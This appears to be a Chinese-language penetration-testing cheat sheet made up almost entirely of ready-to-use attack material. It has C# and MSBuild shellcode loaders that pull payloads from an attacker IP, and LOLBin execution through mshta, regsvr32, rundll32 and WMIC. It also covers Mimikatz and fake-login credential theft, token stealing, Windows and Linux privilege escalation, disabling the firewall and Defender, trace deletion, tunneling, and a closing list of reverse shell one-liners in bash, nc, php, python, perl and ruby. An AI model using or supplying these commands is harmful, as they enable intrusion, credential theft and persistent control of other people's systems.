>C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.IO.Compression.dll /target:library /out: C:\Users\y\Desktop\dll.dll /unsafe C:\Users\y\Desktop\dll.cs>C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /u dll.dll
namespace HYlDKsYF{ public class kxKhdVzWQXolmmF : ServicedComponent { public kxKhdVzWQXolmmF() { Console.WriteLine("doge"); } [ComRegisterFunction] public static void RegisterClass ( string pNNHrTZzW ) { ZApOAKJKY.QYJOTklTwn(); } [ComUnregisterFunction] public static void UnRegisterClass ( string pNNHrTZzW ) { ZApOAKJKY.QYJOTklTwn(); } } public class ZApOAKJKY { [DllImport("kernel32")] private static extern UInt32 HeapCreate(UInt32 FJyyNB, UInt32 fwtsYaiizj, UInt32 dHJhaXQiaqW); [DllImport("kernel32")] private static extern UInt32 HeapAlloc(UInt32 bqtaDNfVCzVox, UInt32 hjDFdZuT, UInt32 JAVAYBFdojxsgo); [DllImport("kernel32")] private static extern UInt32 RtlMoveMemory(UInt32 AQdEyOhn, byte[] wknmfaRmoElGo, UInt32 yRXPRezIkcorSOo); [DllImport("kernel32")] private static extern IntPtr CreateThread(UInt32 uQgiOlrrBaR, UInt32 BxkWKqEKnp, UInt32 lelfRubuprxr, IntPtr qPzVKjdiF,UInt32 kNXJcS, ref UInt32 atiLJcRPnhfyGvp); [DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr XSjyzoKzGmuIOcD, UInt32 VumUGj);static byte[] HMSjEXjuIzkkmo(string aCWWUttzmy,int iJGvqiEDGLhjr) { IPEndPoint YUXVAnzAurxH = new IPEndPoint(IPAddress.Parse(aCWWUttzmy),iJGvqiEDGLhjr); Socket MXCEuiuRIWgOYze = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); try { MXCEuiuRIWgOYze.Connect(YUXVAnzAurxH); } catch { return null;} byte[] Bjpvhc = new byte[4]; MXCEuiuRIWgOYze.Receive(Bjpvhc,4,0);int IETFBI = BitConverter.ToInt32(Bjpvhc,0);byte[] ZKSAAFwxgSDnTW = new byte[IETFBI +5];int JFPJLlk =0;while(JFPJLlk < IETFBI){ JFPJLlk += MXCEuiuRIWgOYze.Receive(ZKSAAFwxgSDnTW, JFPJLlk +5,(IETFBI - JFPJLlk)<4096 ? (IETFBI - JFPJLlk) : 4096,0);}byte[] nXRztzNVwPavq = BitConverter.GetBytes((int)MXCEuiuRIWgOYze.Handle);Array.Copy(nXRztzNVwPavq,0, ZKSAAFwxgSDnTW,1,4); ZKSAAFwxgSDnTW[0]=0xBF;return ZKSAAFwxgSDnTW;}static void TOdKEwPYRUgJly(byte[] KNCtlJWAmlqJ) { if(KNCtlJWAmlqJ !=null) { UInt32 uuKxFZFwog = HeapCreate(0x00040000,(UInt32)KNCtlJWAmlqJ.Length,0); UInt32 sDPjIMhJIOAlwn = HeapAlloc(uuKxFZFwog,0x00000008,(UInt32)KNCtlJWAmlqJ.Length); RtlMoveMemory(sDPjIMhJIOAlwn, KNCtlJWAmlqJ,(UInt32)KNCtlJWAmlqJ.Length); UInt32 ijifOEfllRl =0; IntPtr ihXuoEirmz = CreateThread(0,0, sDPjIMhJIOAlwn, IntPtr.Zero,0, ref ijifOEfllRl); WaitForSingleObject(ihXuoEirmz,0xFFFFFFFF);}} public static void QYJOTklTwn() { byte[] ZKSAAFwxgSDnTW =null; ZKSAAFwxgSDnTW = HMSjEXjuIzkkmo("192.168.0.107",12138); TOdKEwPYRUgJly(ZKSAAFwxgSDnTW); } } }
Msbuild
https://gitee.com/RichChigga/msbuild-execMSF監聽>C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe 1.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"><Target Name="iJEKHyTEjyCU"><xUokfh /></Target><UsingTaskTaskName="xUokfh"TaskFactory="CodeTaskFactory"AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" ><Task><Code Type="Class" Language="cs"><![CDATA[using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Runtime.InteropServices;using System.Threading; using Microsoft.Build.Framework; using Microsoft.Build.Utilities;public class xUokfh : Task, ITask {[DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 ogephG,UInt32 fZZrvQ, UInt32 nDfrBaiPvDyeP, UInt32 LWITkrW);[DllImport("kernel32")]private static extern IntPtr CreateThread(UInt32 qEVoJxknom, UInt32 gZyJBJWYQsnXkWe, UInt32 jyIPELfKQYEVZM,IntPtr adztSLHGJiurGO, UInt32 vjSCprCJ, ref UInt32 KbPukprMQXUp);[DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr wVCIQGmqjONiM, UInt32 DFgVrE);static byte[] VYcZlUehuq(string IJBRrBqhigjGAx, int XBUCexXIrGIEpe) {IPEndPoint DRHsPzS = new IPEndPoint(IPAddress.Parse(IJBRrBqhigjGAx),XBUCexXIrGIEpe);Socket zCoDOd = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);try { zCoDOd.Connect(DRHsPzS); }catch { return null;}byte[] OCrGofbbWRVsFEl = new byte[4];zCoDOd.Receive(OCrGofbbWRVsFEl, 4, 0);int auQJTjyxYw = BitConverter.ToInt32(OCrGofbbWRVsFEl, 0);byte[] MlhacMDOKUAfvMX = new byte[auQJTjyxYw + 5];int GFtbdD = 0;while (GFtbdD < auQJTjyxYw){ GFtbdD += zCoDOd.Receive(MlhacMDOKUAfvMX, GFtbdD + 5, (auQJTjyxYw -GFtbdD) < 4096 ? (auQJTjyxYw - GFtbdD) : 4096, 0);}byte[] YqBRpsmDUT = BitConverter.GetBytes((int)zCoDOd.Handle);Array.Copy(YqBRpsmDUT, 0, MlhacMDOKUAfvMX, 1, 4); MlhacMDOKUAfvMX[0]= 0xBF;return MlhacMDOKUAfvMX;}static void NkoqFHncrcX(byte[] qLAvbAtan) {if (qLAvbAtan != null) {UInt32 jrYMBRkOAnqTqx = VirtualAlloc(0, (UInt32)qLAvbAtan.Length, 0x1000, 0x40);Marshal.Copy(qLAvbAtan, 0, (IntPtr)(jrYMBRkOAnqTqx),qLAvbAtan.Length);IntPtr WCUZoviZi = IntPtr.Zero;UInt32 JhtJOypMKo = 0;IntPtr UxebOmhhPw = IntPtr.Zero;WCUZoviZi = CreateThread(0, 0, jrYMBRkOAnqTqx, UxebOmhhPw, 0, ref JhtJOypMKo);WaitForSingleObject(WCUZoviZi, 0xFFFFFFFF); }}public override bool Execute(){byte[] uABVbNXmhr = null; uABVbNXmhr = VYcZlUehuq("192.168.0.107",12138);NkoqFHncrcX(uABVbNXmhr);return true; } }]]></Code></Task></UsingTask></Project>
Winrm
MSF監聽
>mkdir winrm>copy c:\Windows\System32\cscript.exe winrm創建文件WsmPty.xsl復制payload進去
<?xml version='1.0'?><stylesheetxmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"xmlns:user="placeholder"version="1.0"><output method="text"/><ms:script implements-prefix="user" language="JScript"><![CDATA[var r = new ActiveXObject("WScript.Shell").Run("cmd");]]> </ms:script></stylesheet>
執行>cscript.exe //nologo C:\Windows\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty
Mshta
>use exploit/windows/misc/hta_server>set srvhost 192.168.0.107>mshta http://192.168.0.107:8080/RgNeCv.hta
執行vb >mshta vbscript:CreateObject("Wscript.Shell").Run("calc.exe",0,true)(window.close)Js >mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}Jsrat >mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.2.101:9998/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}
Regsvr32
上線Empire>usestager windows/launcher_sct生成sct文件放入web目錄>regsvr32 /s /n /u /i:http://192.168.0.107:8080/launcher.sct scrobj.dll>cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:http://192.168.0.107/test.sct
Rundll32
執行文件
>rundll32 url.dll, OpenURL file://c:\windows\system32\calc.exe>rundll32 url.dll, OpenURLA file://c:\windows\system32\calc.exe>rundll32 url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e>rundll32 url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e>rundll32 url.dll, FileProtocolHandler calc.exe
無彈窗執行
>rundll32 javascript:"\..\mshtml,RunHTMLApplication ";new%20ActiveXObject("WScript.Shell").Run("C:/Windows/System32/mshta.exe http://192.168.0.107:8080/SU8Fd6kNRz0.hta",0,true);self.close();
增刪注冊表
保存為.inf文件>rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:/reg.inf[Version]Signature="$WINDOWS NT$"[DefaultInstall]AddReg=AddRegDelReg=DelReg[AddReg] #刪除DelReg刪掉紅色部分執行HKLM,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,SYSTEM,0x00000000,c:/windows/temp/sv.exe0x00010001表示REG_DWORD數據類型,0x00000000或省略該項(保留逗號)表示REG_SZ(字符串)
寫文件
>rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";fso=new%20ActiveXObject("Scripting.FileSystemObject");a=fso.CreateTextFile("c:\\Temp\\testfile.txt",true);a.WriteLine("Test");a.Close();self.close();
Out-RundllCommand
使用nishang腳本Out-RundllCommand生成rundll代碼>powershell -nop -w h -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Execution/Out-RundllCommand.ps1'); Out-RundllCommand -Reverse -IPAddress 192.168.0.107 -Port 12345"
注:低版本powershell,隱藏窗口只識別-w hidden,高版本可以-w h執行遠程PS腳本>Out-RundllCommand -PayloadURL http://192.168.0.107/Invoke-PowerShellUdp.ps1 -Arguments "Invoke-PowerShellUdp -Reverse -IPAddress 192.168.0.107 -Port 12138"上線MSF生成psh-reflection格式腳本>rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();r=new%20ActiveXObject("WScript.Shell").run("powershell -w hidden -nologo -noprofile -ep bypass IEX ((New-Object Net.WebClient).DownloadString('http://192.168.0.107/xx.ps1'));",0,true);
DotNetToJScript
通過js/vbs執行.net程序https://github.com/tyranid/DotNetToJScript/releases>DotNetToJScript.exe -o 1.js ExampleAssembly.dll 生成js>DotNetToJScript.exe -l vbscript -o 2.vbs ExampleAssembly.dll生成vbs>DotNetToJScript.exe -l vba -o 2.txt ExampleAssembly.dll 生成vba>DotNetToJScript.exe -u -o 3.sct ExampleAssembly.dll生成sct
StarFighters
https://github.com/Cn33liz/StarFighters 可以執行powershell代碼,詳見執行單條命令$code = 'start calc.exe'$bytes = [System.Text.Encoding]::UNICODE.GetBytes($code);$encoded = [System.Convert]::ToBase64String($bytes)$encoded復制為var EncodedPayload的值遠程執行mimikatzpowershell IEX "(New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/powersploit/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -Command 'log privilege::debug sekurlsa::logonpasswords'"以上保存在code.txt$code = Get-Content -Path code.txt$bytes = [System.Text.Encoding]::UNICODE.GetBytes($code);$encoded = [System.Convert]::ToBase64String($bytes)$encoded | Out-File 2.txt
生成的2.txt文件內容替換為var EncodedPayload的值再執行
繞過AMSI執行
>copy c:\windows\system32\cscript.exe amsi.dll>amsi.dll evil.js
WMIC
Empire建立監聽,生成windows/launcher_xsl模塊的xsl文件保存在web目錄>wmic process get brief /format:http://192.168.0.107:8080/launcher.xsl也可結合mshta使用
<?xml version='1.0'?><stylesheetxmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"xmlns:user="placeholder"version="1.0"><output method="text"/> <ms:script implements-prefix="user" language="JScript"> <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("mshta http://192.168.0.107:8080/RgNeCv.hta"); ]]> </ms:script></stylesheet>
Msxsl
下載https://www.microsoft.com/en-us/download/details.aspx?id=21714遠程執行shellcodehttps://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker/blob/master/shellcode.xml>msxls.exe http://192.168.0.107/shellcode.xml http://192.168.0.107/shellcode.xmlEmpire生成shellcode貼到腳本中EncodedPayload位置
CPL
Kali監聽
編譯成DLL
Control執行>control C:\Users\Administrator.DC\Desktop\VC6.0green\MyProjects\dll\Debug\dll.dll
或將DLL后綴改為cpl,雙擊執行,或rundll32執行>rundll32.exe shell32.dll,Control_RunDLL C:\Users\Administrator.DC\Desktop\VC6.0green\MyProjects\dll\Debug\dll.dll
Runas
#use exploit/windows/local/ask
令牌竊取
MSF
Meterpreter>use incognitoMeterpreter>list_tokens -uMeterpreter>impersonate_token name\\administrator&Meterpreter>psMeterpreter>steal_token pid
Cobalt strike
beacon> steal_token 1234 竊取令牌beacon> rev2self 恢復令牌Windowshttps://gitee.com/RichChigga/incognito2
密碼竊取
偽造鎖屏
https://github.com/Pickfordmatt/SharpLocker/releases
https://github.com/bitsadmin/fakelogonscreen/releases
記錄的密碼保存在%LOCALAPPDATA%\Microsoft\user.db
偽造認證框
CredsLeaker
https://github.com/Dviros/CredsLeaker將cl_reader.php,config.php,config.cl上傳到web服務器修改CredsLeaker.ps1�、run.bat中URL參數
輸入正確密碼后會自動結束,否則除非結束powershell進程才可結束獲取到正確密碼后會在目錄下生成creds.txt保存密碼信息
LoginPrompt
>powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/Invoke-LoginPrompt.ps1');invoke-LoginPrompt"
除非結束進程,否則只能輸對密碼才能關閉對話框����。收到正確密碼會返回結果
Nishang-Invoke-CredentialsPhish
>powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.108/ps/nishang/Gather/Invoke-CredentialsPhish.ps1'); Invoke-CredentialsPhish"
RottenPotato
https://github.com/foxglovesec/RottenPotato Meterpreter>use incognitoMeterpreter>list_tokens -uMeterpreter>upload /root/Desktop/rottenpotato.exeMeterpreter>execute -HC -f rottenpotato.exeMeterpreter>impersonate_token "NT AUTHORITY\\SYSTEM"
PowerUp
檢測有漏洞的服務>powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/powertools/PowerUp/PowerUp.ps1');Invoke-AllChecks"
>icacls C:\Windows\system32\\wlbsctrl.dll 查看文件權限,F為完全控制,M修改
在AbuseFunction中會顯示利用語句�。>powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/powertools/PowerUp/PowerUp.ps1'); Write-HijackDll -OutputFile 'C:\Windows\system32\\wlbsctrl.dll' -Command 'net user admin pass@Qwe1 /add&net localgroup administrators admin /add'"
重啟電腦后會新增用戶admin
查找可能劫持的進程>Find-ProcessDLLHijack查找環境變量中當前用戶可修改的目錄>Find-PathDLLHijack查找存在注冊表中自動登錄用戶的平局>Get-RegistryAutoLogon查詢trusted_service_path>Get-ServiceUnquoted查詢當前用戶可修改的注冊表開機啟動項>Get-ModifiableRegistryAutoRun查詢當前用戶可修改的計劃任務項>Get-ModifiableScheduledTaskFile查詢系統中所有web.config文件中的明文密碼>Get-WebConfig
Powerup-AlwaysInstallElevated
>powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/powertools/PowerUp/PowerUp.ps1');Get-RegAlwaysInstallElevated"
>powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/powertools/PowerUp/PowerUp.ps1'); Write-UserAddMSI"普通用戶執行安裝
AlwaysInstallElevated提權
>reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated>reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated為1 檢測是否永遠以高權限啟動安裝#HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer新建DWORD32 DisableMSI=0#msfvenom -p windows/adduser USER=msi PASS=pass@123 -f msi -o /root/add.msi#upload /root/add.msi c:\\1.msi>msiexec /quiet /qn /i c:\1.msiMSF#use exploit/windows/local/always_install_elevated#set session 1
Trusted Service Paths
>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ 列出沒有用引 號包含的服務#use exploit/windows/local/trusted_service_path#set session 1
Vulnerable Services
#use exploit/windows/local/service_permissions#set session 1
Sudo提權
/home/user/.sudo_as_admin_successful>sudo zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash">sudo tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash>sudo strace –o /dev/null /bin/bash>sudo nmap –interactive nmap>!sh>echo "os.execute('/bin.sh')">/tmp/1.nse>sudo nmap –script=/tmp/shell.nse>sudo more/less/man /etc/rsyslog.conf>sudo git help status>!/bin/bash>sudo ftp>!/bin/bash>sudo vim -c '!sh'>sudo find /bin/ -name ls -exec /bin/bash ;>sudo awk 'BEGIN {system("/bin/sh")}'
Linux計劃任務
>for user in $(getent passwd|cut -f1 -d:); do echo "### Crontabs for $user ####"; crontab -u $user -l; done 列舉所有用戶的crontab$cat /etc/crontab$echo 'echo "ignite ALL=(root) NOPASSWD: ALL" > /etc/sudoers' >test.sh$echo "" > "--checkpoint-action=exec=sh test.sh"$echo "" > --checkpoint=1或編輯可寫的計劃任務文件#!/usr/bin/pythonimport os,subprocess,sockets=socket.socekt(socket.AF_INET,socket.SOCK_STREAM)s.connect(("192.168.0.107","5555"))os.dup2(s.fileno(),0)os.dup2(s.fileno(),1)os.dup2(s.fileno(),2)p=subprocess.call(["/bin/sh","-i"])
Linux SUID提權
查找有root權限的SUID文件$find / -perm -u=s -type f 2>/dev/null$find / -user root -perm -4000 -print 2>/dev/null$find / -user root -perm -4000 -exec ls -ldb {} \;
Find
$touch xxx$/usr/bin/find xxx –exec whoami \;$/usr/bin/find xxx –exec python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.2",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' \;&>find xxx -exec netcat -lvp 12138 -e /bin/sh \; 然后攻擊機主動連接
NMAP
# 進入nmap的交互模式>nmap --interactive>!sh
VIM
>vim.tiny /etc/shadow&>vim.tiny# 按ESC:set shell=/bin/sh:shell
BASH
>bash –p
More/Less/Man
>less /etc/passwd!/bin/sh>more /etc/passwd!/bin/bash>man passwd!/bin/bash
CP/MV
覆蓋shadow文件
Linux /etc/passwd提權
$ls –lh /etc/passwd 若是任何用戶可讀寫$perl -le 'print crypt("password@123","addedsalt")' 生成密碼$echo "test:advwtv/9yU5yQ:0:0:User_like_root:/root:/bin/bash" >>/etc/passwd一條命令添加root用戶#useradd -p `openssl passwd -1 -salt 'user' 123qwe` -u 0 -o -g root -G root -s /bin/bash -d /home/user venus用戶名venus 密碼123qwe#useradd newuser;echo "newuser:password"|chpasswd>echo "admin:x:0:0::/:/bin/sh" >> /etc/passwd>passwd admin修改密碼
Linux臟牛提權
https://github.com/FireFart/dirtycow$gcc -pthread dirty.c -o dirty –lcrypt$./dirty passwd生成賬戶密碼https://github.com/gbonacini/CVE-2016-5195$make$./dcow -s
RDP&Fireawall
爆破
Hydra爆破RDP>hydra -l admin -P /root/Desktop/passwords -S 192.168.0.0 rdp&Nlbrute
注冊表開啟
查詢系統是否允許3389遠程連接:>REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections1表示關閉,0表示開啟查看遠程連接的端口:>REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber本機開啟3389遠程連接的方法通過cmd>REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f>REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f通過reg文件內容如下:Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]"fDenyTSConnections"=dword:00000000[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]"PortNumber"=dword:00000d3d導入注冊表:regedit /s a.reg
NETSH啟動服務
>netsh firewall set service remoteadmin enable>netsh firewall set service remotedesktop enable>netsh firewall set opmode disable 關閉防火墻
注入點開啟
.asp?id=100;exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;--注:修改連接端口重啟后生效
MSF開啟
#run post/windows/manage/enable_rdp
Wmic開啟
>wmic /node:192.168.1.2 /USER:administrator PATH win32_terminalservicesetting WHERE (__Class!="") CALL SetAllowTSConnections 1
防火墻
允許進站如果系統未配置過遠程桌面服務,第一次開啟時還需要添加防火墻規則,允許3389端口,命令如下:>netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow>netsh firewall set portopening TCP 3389 ENABLE防火墻關閉>netsh firewall set opmode mode=disable>netsh advfirewall show allprofiles查看狀態>netsh advfirewall set allprofiles state off>sc stop windefend>sc delete windefendPS> Set-MpPreference -DisableRealtimeMonitoring 1PS> Set-MpPreference -Disablearchivescanning $true
多用戶登錄
Mimikatz設置允許多用戶登錄>privilege::debug>ts::multirdprdpwraphttps://github.com/stascorp/rdpwrap>RDPWInst.exe -i is
RDP連接記錄
https://github.com/3gstudent/List-RDP-Connections-History查看本機用戶連接RDP的記錄
>Psloggedon.exe username
刪除痕跡
@echo off@reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f@del "%USERPROFILE%\My Documents\Default.rdp" /a@exit
端口映射&轉發
MSF
使用條件:服務器通外網,擁有自己的公網ip>portfwd add -l 5555 -p 3389 -r 172.16.86.153轉發目標主機的3389遠程桌面服務端口到本地的5555>portfwd list
lcx.exe
使用條件:服務器通外網,擁有自己的公網ip靶機:lcx.exe -slave 外網IP 9999 127.0.0.1 3389linux攻擊機:./portmap -m 2 -p1 9999 -p2 33889windows攻擊機:lcx -listen 9999 33889 把本機9999監聽的信息轉到33889PortTranhttps://github.com/k8gege/K8tools/raw/master/PortTran.rar攻擊機執行>PortTranS20.exe 12345 389
靶機執行>PortTranC20.exe 127.0.0.1 3389 192.168.0.102 12345建立連接后,攻擊機連接本機389端口即可
SSH
-C 壓縮傳輸,加快傳輸速度-f 在后臺對用戶名密碼進行認證-N 僅僅只用來轉發,不用再彈回一個新的shell -n 后臺運行-q 安靜模式,不要顯示任何debug信息-l 指定ssh登錄名-g 允許遠程主機連接到本地用于轉發的端口-L 進行本地端口轉發-R 進行遠程端口轉發-D 動態轉發,即socks代理-T 禁止分配偽終端-p 指定遠程ssh服務端口
正向轉發
外網靶機110內網靶機115本地攻擊機編輯后restart ssh服務#vim /etc/ssh/sshd_confAllowTcpForwarding yes 允許TCP轉發GatewayPorts yes 允許遠程主機連接本地轉發的端口TCPKeepAlive yes TCP會話保持存活PasswordAuthentication yes 密碼認證>ssh -C -f -N -g -L 33890:192.168.0.115:3389 root@192.168.0.110 -p 22本地攻擊機執行,本地33890轉發到遠程的3389端口上線MSF攻擊機?出網Linux靶機--不出網Linux靶機--不出網win機>msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=不出網Linux機 lport=12138 -f exe -o /var/www/html/1.exe攻擊機監聽端口12345不出網Linux機>ssh -C -f -N -g -L 0.0.0.0:12138:攻擊機:12345 root@出網Linux主機 -p 22
反向轉發
外網攻擊107內網靶機97出網靶機編輯后restart ssh服務#vim /etc/ssh/sshd_confAllowTcpForwarding yes 允許TCP轉發GatewayPorts yes 允許遠程主機連接本地轉發的端口TCPKeepAlive yes TCP會話保持存活PasswordAuthentication yes 密碼認證>ssh -C -f -N -g -R 33890:10.1.1.97:3389 root@192.168.0.107 -p 22出網靶機執行,把外部攻擊機33890轉發到內部隔離網絡的3389>netstat –tnlp
轉發成功,外網攻擊機安裝apt install rinetd(正向tcp轉發工具)>vim /etc/rinetd.conf添加0.0.0.0 3389 127.0.0.1 33890>service rinetd start
看到107是kali攻擊機,連接107:33890即可到達內網10.1.1.97的桌面
Invoke-SocksProxy
https://gitee.com/RichChigga/Invoke-SocksProxy>Import-Module .\Invoke-SocksProxy.psm1>Invoke-SocksProxy -bindPort 12138 建立socks代理,使用代理軟件連接
SSF
單層網絡正向轉發
https://github.com/securesocketfunneling/ssf/releases內網機執行:>ssfd.exe -p 1080
邊界機器執行>ssf.exe -L 12138:10.1.1.108:22 -p 1080 192.168.0.98把內網10.1.1.108的SSH轉發出來
邊界機器訪問內網端口
單層網絡反向轉發
邊界機器執行:>ssfd.exe -p 1080
內網機器執行:>ssf.exe -R 12138:10.1.1.108:22 -p 1080 192.168.0.106
Netsh
邊界機器執行:>netsh interface portproxy add v4tov4 listenaddress=192.168.0.98 listenport=2222 connectaddress=10.1.1.108 connectport=22將內網10.1.1.108主機22端口轉發至本機2222端口,攻擊機連接邊界機器2222端口即可訪問內網SSH
>netsh interface portproxy add v4tov4 listenaddress=192.168.0.98 listenport=13389 connectaddress=192.168.0.98 connectport=3389當靶機某服務只允許內網訪問時,將端口轉發出來
添加防火墻規則:>netsh advfirewall firewall add rule name="RDP" protocol=TCP dir=in localip=192.168.0.98 localport=13389 action=allow列出所有轉發規則:>netsh interface portproxy show all
刪除指定的端口轉發規則:>netsh interface portproxy delete v4tov4 listenport=13389 listenaddress=192.168.0.98刪除所有轉發規則:>netsh interface portproxy reset
Iptables
需開啟ip轉發功能>vim /etc/sysctl.conf設置net.ipv4.ip_forward=1
本地端口22轉發到2222上>iptables -t nat -A PREROUTING -p tcp --dport 2222 -j REDIRECT --to-ports 22內網98機器3389轉到本機110的6789上>iptables -t nat -A PREROUTING -d 192.168.0.110 -p tcp --dport 6789 -j DNAT --to-destination 192.168.0.98:3389>iptables -t nat -A POSTROUTING -d 192.168.0.98 -p tcp --dport 3389 -j SNAT --to 192.168.0.110
查看規則>iptables -t nat -L刪除規則>iptables -t nat -D PREROUTING 1刪除全部規則>iptables -t nat –F
chisel
https://github.com/jpillora/chisel攻擊機執行>chisel server -p 12138 –reverse
靶機執行>chisel client 公網攻擊機IP:12138 R:1234:127.0.0.1:3389
建立成功后,攻擊機連接本機1234端口即可訪問靶機3389
命令&控制
Interactive shell
>python -c 'import pty;pty.spawn("/bin/bash")'>expect -c 'spawn bash;interact'
script reverse shell
bash
>/bin/bash -i > /dev/tcp/attackerip/4444 0<&1 2>&1
>bash -i >& /dev/tcp/attackerip/4444 0>&1
>0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
>msfvenom -p cmd/unix/reverse_bash LHOST=attackerip LPORT=4444 -o shell.sh
nc
>nc -e /bin/sh attackerip 4444>nc -Lp 31337 -vv -e cmd.exe&>mknod backpipe p; nc 192.168.0.107 12138 0<backpipe | /bin/bash 1>backpipe>nc 192.168.0.10 31337
telnet
>mknod backpipe p; telnet attackerip 443 0<backpipe | /bin/bash 1>backpipe
php
#php -r '$sock=fsockopen("IP",port);exec("/bin/sh -i <&3 >&3 2>&3");'<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.107/1234 0>&1'");?>
python
>python -c ' import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2); p=subprocess.call(["/bin/bash","-i"]); '>msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=443 -o shell.py>import socket,struct,time for x in range(10): try: s=socket.socket(2,socket.SOCK_STREAM) s.connect(('IP',端口)) break except: time.sleep(5) l=struct.unpack('>I',s.recv(4))[0] d=s.recv(l) while len(d)
perl
>perl -e 'use Socket;$i=" attackerip ";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'>perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'>perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' #####windows
ruby
>ruby -rsocket -e'f=TCPSocket.open("attackerip ",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'>ruby -rsocket -e 'c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' #####windows
OpenSSL encrypt shell
